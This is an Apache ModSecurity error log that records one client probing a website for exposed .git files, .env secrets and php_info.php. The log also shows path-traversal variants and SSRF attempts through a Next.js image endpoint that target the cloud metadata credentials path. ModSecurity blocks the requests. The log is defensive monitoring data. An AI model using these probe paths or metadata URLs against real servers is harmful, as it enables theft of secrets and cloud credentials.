[Tue May 12 02:41:27.496025 2026] [security2:error] [pid 1695975:tid 1695995] [client 93.123.109.165:4296] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/refs/heads/master"] [unique_id "agJ3N9VI9ymHBxup74-LpQAAAJE"]
[Tue May 12 02:41:27.496133 2026] [security2:error] [pid 1695975:tid 1695995] [client 93.123.109.165:4296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/refs/heads/master"] [unique_id "agJ3N9VI9ymHBxup74-LpQAAAJE"]
[Tue May 12 02:41:27.496369 2026] [security2:error] [pid 1695975:tid 1695995] [client 93.123.109.165:4296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/refs/heads/master"] [unique_id "agJ3N9VI9ymHBxup74-LpQAAAJE"]
[Tue May 12 02:41:27.497529 2026] [security2:error] [pid 1709071:tid 1709087] [client 93.123.109.165:4288] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/refs/heads/main"] [unique_id "agJ3N7vMumyrWMfSu7qpOAAAAMA"]
[Tue May 12 02:41:27.497640 2026] [security2:error] [pid 1709071:tid 1709087] [client 93.123.109.165:4288] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/refs/heads/main"] [unique_id "agJ3N7vMumyrWMfSu7qpOAAAAMA"]
[Tue May 12 02:41:27.497823 2026] [security2:error] [pid 1709071:tid 1709087] [client 93.123.109.165:4288] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/refs/heads/main"] [unique_id "agJ3N7vMumyrWMfSu7qpOAAAAMA"]
[Tue May 12 02:41:27.499502 2026] [security2:error] [pid 1695975:tid 1695993] [client 93.123.109.165:4248] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJ3N9VI9ymHBxup74-LpgAAAI8"]
[Tue May 12 02:41:27.499616 2026] [security2:error] [pid 1695975:tid 1695993] [client 93.123.109.165:4248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJ3N9VI9ymHBxup74-LpgAAAI8"]
[Tue May 12 02:41:27.499718 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:4174] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.gitignore"] [unique_id "agJ3N3o6NvB9WXx5V-55eQAAAQU"]
[Tue May 12 02:41:27.499796 2026] [security2:error] [pid 1695975:tid 1695993] [client 93.123.109.165:4248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJ3N9VI9ymHBxup74-LpgAAAI8"]
[Tue May 12 02:41:27.499830 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:4174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.gitignore"] [unique_id "agJ3N3o6NvB9WXx5V-55eQAAAQU"]
[Tue May 12 02:41:27.500006 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:4174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.gitignore"] [unique_id "agJ3N3o6NvB9WXx5V-55eQAAAQU"]
[Tue May 12 02:41:27.510907 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.ENV"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P1wAAAUA"]
[Tue May 12 02:41:27.510930 2026] [security2:error] [pid 1709071:tid 1709092] [client 93.123.109.165:4264] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N7vMumyrWMfSu7qpOQAAAMU"]
[Tue May 12 02:41:27.511016 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.ENV"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P1wAAAUA"]
[Tue May 12 02:41:27.511034 2026] [security2:error] [pid 1709071:tid 1709092] [client 93.123.109.165:4264] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N7vMumyrWMfSu7qpOQAAAMU"]
[Tue May 12 02:41:27.511199 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.ENV"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P1wAAAUA"]
[Tue May 12 02:41:27.511204 2026] [security2:error] [pid 1709071:tid 1709092] [client 93.123.109.165:4264] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N7vMumyrWMfSu7qpOQAAAMU"]
[Tue May 12 02:41:27.512672 2026] [core:error] [pid 1730207:tid 1730214] [client 93.123.109.165:4196] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 02:41:27.512777 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "of-crystal-lake.net"] [uri "/_next/image"] [unique_id "agJ3N7OxS7i6i_mT2NLHsAAAAEk"]
[Tue May 12 02:41:27.513427 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/_next/image"] [unique_id "agJ3N7OxS7i6i_mT2NLHsAAAAEk"]
[Tue May 12 02:41:27.513631 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/_next/image"] [unique_id "agJ3N7OxS7i6i_mT2NLHsAAAAEk"]
[Tue May 12 02:41:27.519829 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:4174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env#"] [unique_id "agJ3N3o6NvB9WXx5V-55fAAAAQU"]
[Tue May 12 02:41:27.519866 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:4162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "of-crystal-lake.net"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P2QAAAUs"]
[Tue May 12 02:41:27.519916 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:4162] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "of-crystal-lake.net"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P2QAAAUs"]
[Tue May 12 02:41:27.519939 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:4174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env#"] [unique_id "agJ3N3o6NvB9WXx5V-55fAAAAQU"]
[Tue May 12 02:41:27.519944 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:4162] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "of-crystal-lake.net"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P2QAAAUs"]
[Tue May 12 02:41:27.519978 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:4162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P2QAAAUs"]
[Tue May 12 02:41:27.520082 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:4162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P2QAAAUs"]
[Tue May 12 02:41:27.520115 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:4174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env#"] [unique_id "agJ3N3o6NvB9WXx5V-55fAAAAQU"]
[Tue May 12 02:41:27.521325 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:4162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P2QAAAUs"]
[Tue May 12 02:41:27.630851 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJ3N7OxS7i6i_mT2NLHtAAAAEk"]
[Tue May 12 02:41:27.631565 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJ3N7OxS7i6i_mT2NLHtAAAAEk"]
[Tue May 12 02:41:27.631781 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJ3N7OxS7i6i_mT2NLHtAAAAEk"]
[Tue May 12 02:41:27.648764 2026] [:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] File does not exist: /home/ofcrysta/public_html/php_info.php
[Tue May 12 02:41:27.649896 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJ3N7OxS7i6i_mT2NLHtQAAAEk"]
[Tue May 12 02:41:27.650509 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJ3N7OxS7i6i_mT2NLHtQAAAEk"]
[Tue May 12 02:41:27.650628 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N3o6NvB9WXx5V-55gAAAAQE"]
[Tue May 12 02:41:27.650724 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJ3N7OxS7i6i_mT2NLHtQAAAEk"]
